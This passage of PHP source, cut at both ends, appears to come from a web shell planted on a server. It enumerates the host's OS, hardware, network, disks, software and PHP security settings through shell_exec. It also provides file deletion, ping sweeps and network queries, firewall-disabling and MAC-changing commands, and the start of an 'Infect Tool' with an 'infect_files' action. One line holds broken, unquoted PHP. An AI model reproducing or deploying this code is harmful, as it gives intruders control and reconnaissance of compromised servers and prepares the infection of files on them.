Basic OS information $resources['os_name'] = PHP_OS; $resources['os_version'] = php_uname('r'); $resources['os_architecture'] = php_uname('m'); $resources['hostname'] = php_uname('n'); $resources['kernel'] = php_uname('v'); // Memory information if ($is_win) { // Windows memory info using WMI $wmi_mem = shell_exec('wmic OS get FreePhysicalMemory,TotalVisibleMemorySize /Value 2>&1'); if ($wmi_mem) { // Extract memory values preg_match('/TotalVisibleMemorySize=(\d+)/i', $wmi_mem, $total_mem); preg_match('/FreePhysicalMemory=(\d+)/i', $wmi_mem, $free_mem); if (!empty($total_mem[1]) && !empty($free_mem[1])) { // Convert from KB to bytes $total_mem_bytes = (int)$total_mem[1] * 1024; $free_mem_bytes = (int)$free_mem[1] * 1024; $used_mem_bytes = $total_mem_bytes - $free_mem_bytes; $mem_percent = round(($used_mem_bytes / $total_mem_bytes) * 100); $resources['total_memory'] = formatSize($total_mem_bytes); $resources['used_memory'] = formatSize($used_mem_bytes); $resources['free_memory'] = formatSize($free_mem_bytes); $resources['memory_percent'] = $mem_percent; } } // Windows CPU info $wmi_cpu = shell_exec('wmic cpu get LoadPercentage /Value 2>&1'); if ($wmi_cpu) { preg_match('/LoadPercentage=(\d+)/i', $wmi_cpu, $cpu_load); if (!empty($cpu_load[1])) { $resources['cpu_usage'] = $cpu_load[1] . '%'; $resources['cpu_percent'] = (int)$cpu_load[1]; } } // Get CPU information $cpu_info = shell_exec('wmic cpu get Name, NumberOfCores, NumberOfLogicalProcessors, MaxClockSpeed, L2CacheSize, L3CacheSize /Value 2>&1'); if ($cpu_info) { preg_match('/Name=(.+)/i', $cpu_info, $cpu_name); preg_match('/NumberOfCores=(\d+)/i', $cpu_info, $cpu_cores); preg_match('/NumberOfLogicalProcessors=(\d+)/i', $cpu_info, $cpu_threads); preg_match('/MaxClockSpeed=(\d+)/i', $cpu_info, $cpu_speed); preg_match('/L2CacheSize=(\d+)/i', $cpu_info, $l2_cache); preg_match('/L3CacheSize=(\d+)/i', $cpu_info, $l3_cache); if (!empty($cpu_name[1])) { $resources['cpu_model'] = trim($cpu_name[1]); } if (!empty($cpu_cores[1])) { $resources['cpu_cores'] = $cpu_cores[1]; } if (!empty($cpu_threads[1])) { $resources['cpu_threads'] = $cpu_threads[1]; } if (!empty($cpu_speed[1])) { $resources['cpu_speed'] = round($cpu_speed[1] / 1000, 2) . ' GHz'; } if (!empty($l2_cache[1])) { $resources['l2_cache'] = formatSize($l2_cache[1] * 1024); } if (!empty($l3_cache[1])) { $resources['l3_cache'] = formatSize($l3_cache[1] * 1024); } } // Get uptime for Windows $uptime_info = shell_exec('net statistics server | find "Statistics since" 2>&1'); if ($uptime_info) { $resources['system_uptime'] = trim(str_replace('Statistics since', '', $uptime_info)); } // Get Windows version information $os_info = shell_exec('wmic os get Caption, Version, BuildNumber /Value 2>&1'); if ($os_info) { preg_match('/Caption=(.+)/i', $os_info, $os_caption); preg_match('/Version=(.+)/i', $os_info, $os_version); preg_match('/BuildNumber=(.+)/i', $os_info, $os_build); if (!empty($os_caption[1])) { $resources['os_full_name'] = trim($os_caption[1]); } if (!empty($os_version[1])) { $resources['os_full_version'] = trim($os_version[1]); } if (!empty($os_build[1])) { $resources['os_build'] = trim($os_build[1]); } } // Get network interfaces for Windows $net_info = shell_exec('wmic nicconfig where "IPEnabled=TRUE" get Caption, IPAddress, MACAddress, DefaultIPGateway /format:list 2>&1'); if ($net_info) { preg_match_all('/Caption=(.+)[\r\n]+DefaultIPGateway=\{(".+")\}[\r\n]+IPAddress=\{(".+")\}[\r\n]+MACAddress=(.+)/i', $net_info, $matches, PREG_SET_ORDER); $resources['network_interfaces'] = []; foreach ($matches as $match) { if (count($match) >= 5) { $ip_addresses = json_decode($match[3]); $gateway = json_decode($match[2]); $resources['network_interfaces'][] = [ 'name' => trim($match[1]), 'mac' => trim($match[4]), 'ip' => is_array($ip_addresses) && !empty($ip_addresses) ? $ip_addresses[0] : 'Unknown', 'gateway' => is_array($gateway) && !empty($gateway) ? $gateway[0] : 'Unknown' ]; } } } // Get disk information $disk_info = shell_exec('wmic logicaldisk get Caption, FileSystem, Size, FreeSpace /format:list 2>&1'); if ($disk_info) { preg_match_all('/Caption=(.+)[\r\n]+FileSystem=(.+)[\r\n]+FreeSpace=(\d+)[\r\n]+Size=(\d+)/i', $disk_info, $matches, PREG_SET_ORDER); $resources['disks'] = []; foreach ($matches as $match) { if (count($match) >= 5 && !empty($match[4])) { $total = (float)$match[4]; $free = (float)$match[3]; $used = $total - $free; $percent = ($total > 0) ? round(($used / $total) * 100) : 0; $resources['disks'][] = [ 'drive' => trim($match[1]), 'filesystem' => trim($match[2]), 'total' => formatSize($total), 'used' => formatSize($used), 'free' => formatSize($free), 'percent' => $percent ]; } } } // Get installed software (limited to 10 entries) $software_info = shell_exec('wmic product get Name, Version /format:list 2>&1'); if ($software_info) { preg_match_all('/Name=(.+)[\r\n]+Version=(.+)/i', $software_info, $matches, PREG_SET_ORDER); $resources['installed_software'] = []; $count = 0; foreach ($matches as $match) { if (count($match) >= 3 && !empty(trim($match[1]))) { $resources['installed_software'][] = [ 'name' => trim($match[1]), 'version' => trim($match[2]) ]; $count++; if ($count >= 10) break; // Limit to 10 entries } } } } elseif ($is_linux) { // Linux memory info from /proc/meminfo if (is_readable('/proc/meminfo')) { $mem_info = file_get_contents('/proc/meminfo'); preg_match('/MemTotal:\s+(\d+)/i', $mem_info, $total_mem); preg_match('/MemFree:\s+(\d+)/i', $mem_info, $free_mem); preg_match('/Buffers:\s+(\d+)/i', $mem_info, $buffers); preg_match('/Cached:\s+(\d+)/i', $mem_info, $cached); preg_match('/SwapTotal:\s+(\d+)/i', $mem_info, $swap_total); preg_match('/SwapFree:\s+(\d+)/i', $mem_info, $swap_free); if (!empty($total_mem[1]) && !empty($free_mem[1])) { // Convert from KB to bytes $total_mem_bytes = (int)$total_mem[1] * 1024; $free_mem_bytes = (int)$free_mem[1] * 1024; $buffers_bytes = (!empty($buffers[1])) ? (int)$buffers[1] * 1024 : 0; $cached_bytes = (!empty($cached[1])) ? (int)$cached[1] * 1024 : 0; $used_mem_bytes = $total_mem_bytes - $free_mem_bytes - $buffers_bytes - $cached_bytes; $mem_percent = round(($used_mem_bytes / $total_mem_bytes) * 100); $resources['total_memory'] = formatSize($total_mem_bytes); $resources['used_memory'] = formatSize($used_mem_bytes); $resources['free_memory'] = formatSize($free_mem_bytes + $buffers_bytes + $cached_bytes); $resources['memory_percent'] = $mem_percent; // Swap information if (!empty($swap_total[1])) { $swap_total_bytes = (int)$swap_total[1] * 1024; $swap_free_bytes = (!empty($swap_free[1])) ? (int)$swap_free[1] * 1024 : 0; $swap_used_bytes = $swap_total_bytes - $swap_free_bytes; $swap_percent = ($swap_total_bytes > 0) ? round(($swap_used_bytes / $swap_total_bytes) * 100) : 0; $resources['swap_total'] = formatSize($swap_total_bytes); $resources['swap_used'] = formatSize($swap_used_bytes); $resources['swap_free'] = formatSize($swap_free_bytes); $resources['swap_percent'] = $swap_percent; } } } // Linux distribution details if (is_readable('/etc/os-release')) { $os_release = parse_ini_file('/etc/os-release'); if (!empty($os_release['PRETTY_NAME'])) { $resources['os_full_name'] = $os_release['PRETTY_NAME']; } if (!empty($os_release['VERSION'])) { $resources['os_full_version'] = $os_release['VERSION']; } } // Linux CPU load from /proc/loadavg if (is_readable('/proc/loadavg')) { $load = file_get_contents('/proc/loadavg'); $load_arr = explode(' ', $load); if (isset($load_arr[0])) { $resources['load_avg_1m'] = $load_arr[0]; $resources['load_avg_5m'] = isset($load_arr[1]) ? $load_arr[1] : ''; $resources['load_avg_15m'] = isset($load_arr[2]) ? $load_arr[2] : ''; } } // Try to get CPU usage percentage using top $cpu_info = shell_exec("top -bn1 | grep 'Cpu(s)' | sed 's/.*, *\$[0-9.]*\$%* id.*/\\1/' | awk '{print 100 - $1}' 2>&1"); if ($cpu_info) { $resources['cpu_usage'] = round(trim($cpu_info), 1) . '%'; $resources['cpu_percent'] = round(trim($cpu_info), 1); } // Get CPU information if (is_readable('/proc/cpuinfo')) { $cpu_info = file_get_contents('/proc/cpuinfo'); preg_match_all('/model name\s+:\s+(.+)/i', $cpu_info, $cpu_model); preg_match_all('/processor\s+:\s+/i', $cpu_info, $processors); preg_match_all('/cpu MHz\s+:\s+(.+)/i', $cpu_info, $cpu_freq); preg_match_all('/cache size\s+:\s+(.+)/i', $cpu_info, $cpu_cache); if (!empty($cpu_model[1])) { $resources['cpu_model'] = $cpu_model[1][0]; $resources['cpu_cores'] = count($processors[0]); if (!empty($cpu_freq[1])) { $resources['cpu_speed'] = $cpu_freq[1][0] . ' MHz'; } if (!empty($cpu_cache[1])) { $resources['cpu_cache'] = $cpu_cache[1][0]; } } } // Get uptime for Linux if (is_readable('/proc/uptime')) { $uptime = file_get_contents('/proc/uptime'); $uptime = explode(' ', $uptime)[0]; $days = floor($uptime / 86400); $hours = floor(($uptime % 86400) / 3600); $minutes = floor(($uptime % 3600) / 60); $seconds = $uptime % 60; $resources['system_uptime'] = "{$days} days, {$hours} hours, {$minutes} minutes, {$seconds} seconds"; $resources['uptime_seconds'] = $uptime; } // Get network interfaces for Linux $net_interfaces = shell_exec("ip -o addr show scope global | awk '{print $2, $4}' 2>&1"); if ($net_interfaces) { $interfaces = explode("\n", trim($net_interfaces)); $resources['network_interfaces'] = []; foreach ($interfaces as $interface) { if (!empty($interface)) { list($if_name, $if_ip) = explode(' ', trim($interface), 2); $if_ip = str_replace('/', ' ', $if_ip); // Get MAC address $mac_addr = shell_exec("ip link show $if_name | grep -o 'link/ether [^ ]*' | cut -d' ' -f2 2>&1"); $resources['network_interfaces'][] = [ 'name' => $if_name, 'ip' => $if_ip, 'mac' => trim($mac_addr) ]; } } } // Get disk information for Linux $disk_info = shell_exec("df -T | grep -v 'tmpfs\\|cdrom' 2>&1"); if ($disk_info) { $lines = explode("\n", trim($disk_info)); $resources['disks'] = []; // Skip header line for ($i = 1; $i < count($lines); $i++) { $parts = preg_split('/\s+/', trim($lines[$i])); if (count($parts) >= 7) { $device = $parts[0]; $fs_type = $parts[1]; $total = $parts[2] * 1024; // Convert to bytes $used = $parts[3] * 1024; $available = $parts[4] * 1024; $percent = (int)str_replace('%', '', $parts[5]); $mount_point = $parts[6]; $resources['disks'][] = [ 'device' => $device, 'filesystem' => $fs_type, 'mount_point' => $mount_point, 'total' => formatSize($total), 'used' => formatSize($used), 'free' => formatSize($available), 'percent' => $percent ]; } } } } elseif ($is_mac) { // MacOS memory info using vm_stat $vm_stat = shell_exec('vm_stat 2>&1'); $sysctl = shell_exec('sysctl hw.memsize 2>&1'); if ($vm_stat && $sysctl) { preg_match('/hw.memsize: (\d+)/', $sysctl, $total_mem); preg_match('/Pages free:\s+(\d+)/', $vm_stat, $free_pages); preg_match('/Pages active:\s+(\d+)/', $vm_stat, $active_pages); preg_match('/Pages inactive:\s+(\d+)/', $vm_stat, $inactive_pages); preg_match('/Pages speculative:\s+(\d+)/', $vm_stat, $speculative_pages); preg_match('/Pages wired down:\s+(\d+)/', $vm_stat, $wired_pages); if (!empty($total_mem[1]) && !empty($free_pages[1])) { $page_size = 4096; // Default page size on most MacOS systems $total_mem_bytes = (int)$total_mem[1]; $free_mem_bytes = (int)$free_pages[1] * $page_size; $active_mem_bytes = (!empty($active_pages[1])) ? (int)$active_pages[1] * $page_size : 0; $inactive_mem_bytes = (!empty($inactive_pages[1])) ? (int)$inactive_pages[1] * $page_size : 0; $speculative_mem_bytes = (!empty($speculative_pages[1])) ? (int)$speculative_pages[1] * $page_size : 0; $wired_mem_bytes = (!empty($wired_pages[1])) ? (int)$wired_pages[1] * $page_size : 0; $used_mem_bytes = $total_mem_bytes - $free_mem_bytes - $inactive_mem_bytes - $speculative_mem_bytes; $mem_percent = round(($used_mem_bytes / $total_mem_bytes) * 100); $resources['total_memory'] = formatSize($total_mem_bytes); $resources['used_memory'] = formatSize($used_mem_bytes); $resources['free_memory'] = formatSize($free_mem_bytes + $inactive_mem_bytes + $speculative_mem_bytes); $resources['memory_percent'] = $mem_percent; $resources['wired_memory'] = formatSize($wired_mem_bytes); $resources['active_memory'] = formatSize($active_mem_bytes); } } // MacOS CPU info $cpu_info = shell_exec('top -l 1 | grep "CPU usage" 2>&1'); if ($cpu_info) { preg_match('/(\d+\.\d+)% user, (\d+\.\d+)% sys, (\d+\.\d+)% idle/', $cpu_info, $cpu_matches); if (!empty($cpu_matches)) { $user = (float)$cpu_matches[1]; $sys = (float)$cpu_matches[2]; $idle = (float)$cpu_matches[3]; $cpu_usage = round($user + $sys, 1); $resources['cpu_usage'] = $cpu_usage . '%'; $resources['cpu_percent'] = $cpu_usage; $resources['cpu_user'] = $user . '%'; $resources['cpu_system'] = $sys . '%'; $resources['cpu_idle'] = $idle . '%'; } } // Get CPU model for MacOS $cpu_model = shell_exec('sysctl -n machdep.cpu.brand_string 2>&1'); if ($cpu_model) { $resources['cpu_model'] = trim($cpu_model); // Get CPU cores $cpu_cores = shell_exec('sysctl -n hw.physicalcpu 2>&1'); $cpu_threads = shell_exec('sysctl -n hw.logicalcpu 2>&1'); $cpu_freq = shell_exec('sysctl -n hw.cpufrequency 2>&1'); if ($cpu_cores && $cpu_threads) { $resources['cpu_cores'] = trim($cpu_cores); $resources['cpu_threads'] = trim($cpu_threads); } if ($cpu_freq) { $resources['cpu_speed'] = round(trim($cpu_freq) / 1000000000, 2) . ' GHz'; } } // Get MacOS version $os_version = shell_exec('sw_vers 2>&1'); if ($os_version) { preg_match('/ProductName:\s+(.+)/', $os_version, $name); preg_match('/ProductVersion:\s+(.+)/', $os_version, $version); preg_match('/BuildVersion:\s+(.+)/', $os_version, $build); if (!empty($name[1]) && !empty($version[1])) { $resources['os_full_name'] = trim($name[1]) . ' ' . trim($version[1]); $resources['os_full_version'] = trim($version[1]); if (!empty($build[1])) { $resources['os_build'] = trim($build[1]); } } } // Get uptime for MacOS $uptime_info = shell_exec('uptime 2>&1'); if ($uptime_info) { $resources['system_uptime'] = trim($uptime_info); // Get raw uptime in seconds $boot_time = shell_exec('sysctl -n kern.boottime 2>&1'); if ($boot_time) { preg_match('/sec = (\d+)/', $boot_time, $match); if (!empty($match[1])) { $boot_timestamp = (int)$match[1]; $uptime_seconds = time() - $boot_timestamp; $resources['uptime_seconds'] = $uptime_seconds; } } } // Get network interfaces for MacOS $net_interfaces = shell_exec("ifconfig | grep -E 'inet |ether ' 2>&1"); if ($net_interfaces) { $lines = explode("\n", trim($net_interfaces)); $current_if = null; $resources['network_interfaces'] = []; $interfaces = []; foreach ($lines as $line) { if (strpos($line, 'inet ') !== false) { preg_match('/inet (\d+\.\d+\.\d+\.\d+)/', $line, $match); if (!empty($match[1]) && $match[1] != '127.0.0.1') { $current_if = ['ip' => $match[1]]; $interfaces[] = $current_if; } } elseif (strpos($line, 'ether ') !== false && $current_if !== null) { preg_match('/ether ([0-9a-f:]+)/', $line, $match); if (!empty($match[1])) { $current_if['mac'] = $match[1]; } } } // Get interface names $if_names = shell_exec("networksetup -listallhardwareports | grep -E 'Hardware Port:|Device:' 2>&1"); if ($if_names) { preg_match_all('/Hardware Port: (.+)\\nDevice: (.+)/', $if_names, $matches, PREG_SET_ORDER); foreach ($interfaces as $idx => $interface) { if (isset($matches[$idx])) { $interfaces[$idx]['name'] = $matches[$idx][1] . ' (' . $matches[$idx][2] . ')'; } else { $interfaces[$idx]['name'] = 'Interface ' . ($idx + 1); } } } $resources['network_interfaces'] = $interfaces; } // Get disk information for MacOS $disk_info = shell_exec("df -h | grep -v 'devfs\\|map' 2>&1"); if ($disk_info) { $lines = explode("\n", trim($disk_info)); $resources['disks'] = []; foreach ($lines as $line) { $parts = preg_split('/\s+/', trim($line)); if (count($parts) >= 9) { $device = $parts[0]; $total = $parts[1]; $used = $parts[2]; $free = $parts[3]; $percent = str_replace('%', '', $parts[4]); $mount_point = $parts[8]; $resources['disks'][] = [ 'device' => $device, 'mount_point' => $mount_point, 'total' => $total, 'used' => $used, 'free' => $free, 'percent' => (int)$percent ]; } } } } // Get load average for all systems if (function_exists('sys_getloadavg')) { $load_avg = sys_getloadavg(); if (!empty($load_avg)) { $resources['load_avg_1m'] = $load_avg[0]; $resources['load_avg_5m'] = $load_avg[1]; $resources['load_avg_15m'] = $load_avg[2]; } } // Process count if ($is_win) { $process_count = shell_exec('tasklist /FO CSV | find /c /v ""'); if ($process_count) { $resources['process_count'] = (int)$process_count - 1; // Subtract header line } } else { $process_count = shell_exec('ps aux | wc -l'); if ($process_count) { $resources['process_count'] = (int)$process_count - 1; // Subtract header line } } // Web server information $resources['web_server'] = $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; $resources['http_host'] = $_SERVER['HTTP_HOST'] ?? 'Unknown'; $resources['document_root'] = $_SERVER['DOCUMENT_ROOT'] ?? 'Unknown'; $resources['server_protocol'] = $_SERVER['SERVER_PROTOCOL'] ?? 'Unknown'; $resources['request_time'] = isset($_SERVER['REQUEST_TIME']) ? date('Y-m-d H:i:s', $_SERVER['REQUEST_TIME']) : 'Unknown'; $resources['server_admin'] = $_SERVER['SERVER_ADMIN'] ?? 'Unknown'; // PHP information $resources['php_version'] = PHP_VERSION; $resources['php_sapi'] = php_sapi_name(); $resources['php_memory_limit'] = ini_get('memory_limit'); $resources['php_max_execution_time'] = ini_get('max_execution_time') . ' seconds'; $resources['php_upload_max_filesize'] = ini_get('upload_max_filesize'); $resources['php_post_max_size'] = ini_get('post_max_size'); // Include disk information global $disk_total, $disk_free, $disk_used, $disk_percent; $resources['disk_total'] = formatSize($disk_total); $resources['disk_free'] = formatSize($disk_free); $resources['disk_used'] = formatSize($disk_used); $resources['disk_percent'] = $disk_percent; return $resources;}$disk_free = disk_free_space($dir);$disk_total = disk_total_space($dir);$disk_used = $disk_total - $disk_free;$disk_percent = round(($disk_used / $disk_total) * 100);// Get system resources$refresh_resources = isset($_GET['refresh']) && $_GET['refresh'] == 1;$system_resources_cache_file = sys_get_temp_dir() . '/rahimi_system_resources.cache';// Clear cache or use cached resources if available and not too old (30 seconds)if ($refresh_resources || !file_exists($system_resources_cache_file) || (time() - filemtime($system_resources_cache_file) > 30)) { $system_resources = getSystemResources(); // Cache the results file_put_contents($system_resources_cache_file, serialize($system_resources));} else { // Use cached resources $system_resources = unserialize(file_get_contents($system_resources_cache_file));}// Get PHP infofunction getPhpInfo() { $info = []; // System Information - Group 1: Core PHP Info $info['PHP Version'] = PHP_VERSION; $info['Server API'] = php_sapi_name(); $info['Zend Version'] = zend_version(); // System Information - Group 2: Server Environment $info['Operating System'] = Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64; $info['Document Root'] = $_SERVER['DOCUMENT_ROOT'] ?? 'Unknown'; $info['Server Hostname'] = $_SERVER['HTTP_HOST'] ?? 'Unknown'; $info['Server Software'] = $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown'; // System Information - Group 3: Network Information $info['Server IP'] = $_SERVER['SERVER_ADDR'] ?? 'Unknown'; $info['Client IP'] = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; $info['User Agent'] = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; // System Information - Group 4: PHP Configuration $info['Memory Limit'] = ini_get('memory_limit'); $info['Upload Max Filesize'] = ini_get('upload_max_filesize'); $info['Post Max Size'] = ini_get('post_max_size'); $info['Max Execution Time'] = ini_get('max_execution_time') . ' seconds'; $info['Max Input Time'] = ini_get('max_input_time') . ' seconds'; $info['Display Errors'] = ini_get('display_errors') ? 'Enabled' : 'Disabled'; $info['Error Reporting'] = ini_get('error_reporting'); $info['Default Charset'] = ini_get('default_charset'); // System Information - Group 5: PHP Extensions & Security $info['Disabled Functions'] = ini_get('disable_functions') ?: 'None'; $info['PHP Modules'] = implode(', ', get_loaded_extensions()); $info['Allow URL fopen'] = ini_get('allow_url_fopen') ? 'Enabled (Security Risk)' : 'Disabled'; $info['Register Globals'] = ini_get('register_globals') ? 'Enabled (Security Risk)' : 'Disabled'; $info['Session Save Path'] = ini_get('session.save_path') ?: 'Default'; $info['Safe Mode'] = ini_get('safe_mode') ? 'Enabled' : 'Disabled'; // System Information - Group 6: Database Support $dbSupport = []; if (extension_loaded('mysqli')) $dbSupport[] = 'MySQL (mysqli)'; if (extension_loaded('pdo_mysql')) $dbSupport[] = 'MySQL (PDO)'; if (extension_loaded('pgsql')) $dbSupport[] = 'PostgreSQL'; if (extension_loaded('pdo_pgsql')) $dbSupport[] = 'PostgreSQL (PDO)'; if (extension_loaded('sqlite3')) $dbSupport[] = 'SQLite3'; if (extension_loaded('pdo_sqlite')) $dbSupport[] = 'SQLite (PDO)'; if (extension_loaded('mongodb')) $dbSupport[] = 'MongoDB'; if (extension_loaded('pdo_odbc')) $dbSupport[] = 'ODBC (PDO)'; if (extension_loaded('oci8')) $dbSupport[] = 'Oracle'; if (extension_loaded('pdo_oci')) $dbSupport[] = 'Oracle (PDO)'; $info['Database Support'] = !empty($dbSupport) ? implode(', ', $dbSupport) : 'None detected'; return $info;}$php_info = getPhpInfo();// File action$action_target = '';if (isset($_GET['action']) && isset($_GET['target'])) { $action = $_GET['action']; $action_target = $_GET['target'];}// Logout handlerif (isset($_GET['logout']) && $_GET['logout'] == 1) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit;}// Delete file or directoryif (isset($_POST['delete']) && !empty($_POST['delete']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $delete = realpath($dir . '/' . $_POST['delete']); if ($delete !== false && is_file($delete)) { if (unlink($delete)) { $message = ["success" => "File deleted successfully!"]; } else { $message = ["error" => "Failed to delete file! Check permissions."]; } } elseif ($delete !== false && is_dir($delete)) { if (deleteDirectory($delete)) { $message = ["success" => "Directory deleted successfully!"]; } else { $message = ["error" => "Failed to delete directory! Check permissions."]; } } else { $message = ["error" => "File or directory not found!"]; } if ($isAjax) { sendJsonResponse($message); }}// Network Tools processing$network_result = '';if (isset($_POST['network_action']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { switch ($_POST['network_action']) { case 'ping': if (isset($_POST['ping_target']) && !empty($_POST['ping_target'])) { $target = escapeshellarg($_POST['ping_target']); $count = isset($_POST['ping_count']) ? (int)$_POST['ping_count'] : 4; $count = min(max($count, 1), 20); // Limit between 1 and 20 $os = strtolower(PHP_OS); if (strpos($os, 'win') !== false) { // Windows $cmd = "ping -n $count $target"; } else { // Linux/Unix/Mac $cmd = "ping -c $count $target"; } $network_result = shell_exec($cmd . ' 2>&1'); } break; case 'network_info': if (isset($_POST['network_cmd']) && !empty($_POST['network_cmd'])) { $cmd = $_POST['network_cmd']; $os = strtolower(PHP_OS); if ($cmd === 'ifconfig') { if (strpos($os, 'win') !== false) { $network_result = shell_exec('ipconfig /all 2>&1'); } else { $network_result = shell_exec('ifconfig 2>&1') ?: shell_exec('ip addr 2>&1'); } } elseif ($cmd === 'netstat') { if (strpos($os, 'win') !== false) { $network_result = shell_exec('netstat -an 2>&1'); } else { $network_result = shell_exec('netstat -tuln 2>&1'); } } elseif ($cmd === 'arp') { if (strpos($os, 'win') !== false) { $network_result = shell_exec('arp -a 2>&1'); } else { $network_result = shell_exec('arp -n 2>&1'); } } elseif ($cmd === 'route') { if (strpos($os, 'win') !== false) { $network_result = shell_exec('route print 2>&1'); } else { $network_result = shell_exec('route -n 2>&1') ?: shell_exec('ip route list 2>&1'); } } } break; case 'change_mac': if (isset($_POST['mac_interface'], $_POST['mac_address']) && !empty($_POST['mac_interface']) && !empty($_POST['mac_address'])) { $interface = escapeshellarg($_POST['mac_interface']); $mac_address = escapeshellarg($_POST['mac_address']); $os = strtolower(PHP_OS); if (strpos($os, 'win') !== false) { // Windows - requires admin privileges $network_result = "For Windows, run these commands in an elevated command prompt:\n\n"; $network_result .= "1. netsh interface set interface \"$interface\" admin=disable\n"; $network_result .= "2. reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\0000 /v NetworkAddress /t REG_SZ /d $mac_address /f\n"; $network_result .= "3. netsh interface set interface \"$interface\" admin=enable\n\n"; $network_result .= "Note: The registry path may vary depending on your network adapter. Check Device Manager for the correct interface number."; } else { // Linux - also requires root/sudo // First get the current status $current_mac = shell_exec("ifconfig $interface | grep -o -E '([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}'"); $network_result = "Current MAC address for $interface: " . ($current_mac ?: "Not found") . "\n\n"; $network_result .= "To change the MAC address in Linux, run:\n\n"; $network_result .= "sudo ifconfig $interface down\n"; $network_result .= "sudo ifconfig $interface hw ether $mac_address\n"; $network_result .= "sudo ifconfig $interface up\n\n"; $network_result .= "Note: This operation requires root privileges."; } } break; case 'firewall_config': if (isset($_POST['firewall_action'])) { $action = $_POST['firewall_action']; $os = strtolower(PHP_OS); if (strpos($os, 'win') !== false) { // Windows Firewall switch ($action) { case 'status': $network_result = shell_exec('netsh advfirewall show allprofiles state 2>&1'); break; case 'enable': $network_result = "To enable Windows Firewall, run in elevated command prompt:\n\n"; $network_result .= "netsh advfirewall set allprofiles state on"; break; case 'disable': $network_result = "To disable Windows Firewall, run in elevated command prompt:\n\n"; $network_result .= "netsh advfirewall set allprofiles state off\n\n"; $network_result .= "WARNING: Disabling the firewall may put your system at risk!"; break; case 'reset': $network_result = "To reset Windows Firewall to default settings, run in elevated command prompt:\n\n"; $network_result .= "netsh advfirewall reset"; break; } } else { // Linux (iptables or ufw) switch ($action) { case 'status': $ufw_output = shell_exec('ufw status 2>&1'); $iptables_output = shell_exec('iptables -L -v 2>&1'); $network_result = "UFW Status:\n$ufw_output\n\nIPTables Rules:\n$iptables_output"; break; case 'enable': $network_result = "To enable the firewall in Linux, run:\n\n"; $network_result .= "For UFW: sudo ufw enable\n"; $network_result .= "For iptables: See /etc/init.d/iptables start"; break; case 'disable': $network_result = "To disable the firewall in Linux, run:\n\n"; $network_result .= "For UFW: sudo ufw disable\n"; $network_result .= "For iptables: sudo iptables -F\n\n"; $network_result .= "WARNING: Disabling the firewall may put your system at risk!"; break; case 'reset': $network_result = "To reset firewall in Linux, run:\n\n"; $network_result .= "For UFW: sudo ufw reset\n"; $network_result .= "For iptables: sudo iptables -F"; break; } } } break; case 'bandwidth_monitor': if (isset($_POST['monitor_duration'])) { $duration = min(max((int)$_POST['monitor_duration'], 1), 30); // Limit between 1 and 30 seconds $os = strtolower(PHP_OS); if (strpos($os, 'win') !== false) { // Windows - use netstat with a time delay $network_result = "Monitoring network activity for {$duration} seconds...\n\n"; $network_result .= "Initial state:\n"; $network_result .= shell_exec('netstat -e 2>&1') . "\n\n"; // Sleep for the duration sleep($duration); $network_result .= "After {$duration} seconds:\n"; $network_result .= shell_exec('netstat -e 2>&1'); } else { // Linux - try iftop, if not available use ifstat or just netstat if (shell_exec('which iftop 2>/dev/null')) { $network_result = "Using iftop to monitor bandwidth for {$duration} seconds.\n"; $network_result .= "This would normally use: sudo iftop -t -s {$duration}\n\n"; $network_result .= "Since iftop requires root privileges and a direct terminal, here's netstat output instead:\n\n"; $network_result .= shell_exec('netstat -i 2>&1'); } else { $network_result = "Monitoring network activity for {$duration} seconds...\n\n"; $network_result .= "Initial state:\n"; $network_result .= shell_exec('netstat -i 2>&1') . "\n\n"; // Sleep for the duration sleep($duration); $network_result .= "After {$duration} seconds:\n"; $network_result .= shell_exec('netstat -i 2>&1'); } } } break; case 'network_scan': if (isset($_POST['scan_ip_range']) && !empty($_POST['scan_ip_range'])) { $ip_range = escapeshellarg($_POST['scan_ip_range']); $os = strtolower(PHP_OS); if (strpos($os, 'win') !== false) { // Windows - using ping sweep if (preg_match('/^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.0\/24$/', $_POST['scan_ip_range'], $matches)) { $base_ip = $matches[1]; $network_result = "Scanning network {$base_ip}.0/24...\n\n"; $network_result .= "Live hosts:\n"; // Perform a simple ping sweep (limited to a few addresses to avoid timeout) for ($i = 1; $i <= 10; $i++) { $ip = "$base_ip.$i"; $ping = shell_exec("ping -n 1 -w 200 $ip | findstr TTL"); if ($ping) { $network_result .= "$ip - Active\n"; } } $network_result .= "\nNote: Limited to first 10 addresses. For a full scan, use:\n"; $network_result .= "FOR /L %i IN (1,1,254) DO @ping -n 1 -w 200 {$base_ip}.%i | findstr TTL"; } else { $network_result = "Please provide a valid CIDR range (e.g., 192.168.1.0/24)"; } } else { // Linux - try to use nmap, fall back to ping sweep if (shell_exec('which nmap 2>/dev/null')) { $network_result = "Network scan results for $ip_range:\n\n"; $network_result .= "This would normally use: sudo nmap -sn $ip_range\n\n"; $network_result .= "Since nmap scan requires root privileges, here's just the available interfaces:\n\n"; $network_result .= shell_exec('ip addr show 2>&1'); } else { // Simple ping sweep for Linux if (preg_match('/^([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})\.0\/24$/', $_POST['scan_ip_range'], $matches)) { $base_ip = $matches[1]; $network_result = "Scanning network {$base_ip}.0/24...\n\n"; $network_result .= "This would normally use: for i in {1..254}; do ping -c 1 -W 1 $base_ip.$i | grep from; done\n\n"; $network_result .= "Since full scan takes too long, checking only a few addresses:\n\n"; for ($i = 1; $i <= 5; $i++) { $ip = "$base_ip.$i"; $ping = shell_exec("ping -c 1 -W 1 $ip 2>&1"); $network_result .= "$ip - " . (strpos($ping, ' bytes from ') !== false ? "Active" : "Inactive") . "\n"; } } else { $network_result = "Please provide a valid CIDR range (e.g., 192.168.1.0/24)"; } } } } break; }}// Infect Tool Request handling$infect_result = '';if (isset($_POST['infect_action']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $infect_action = $_POST['infect_action']; switch ($infect_action) { case 'infect_files': if 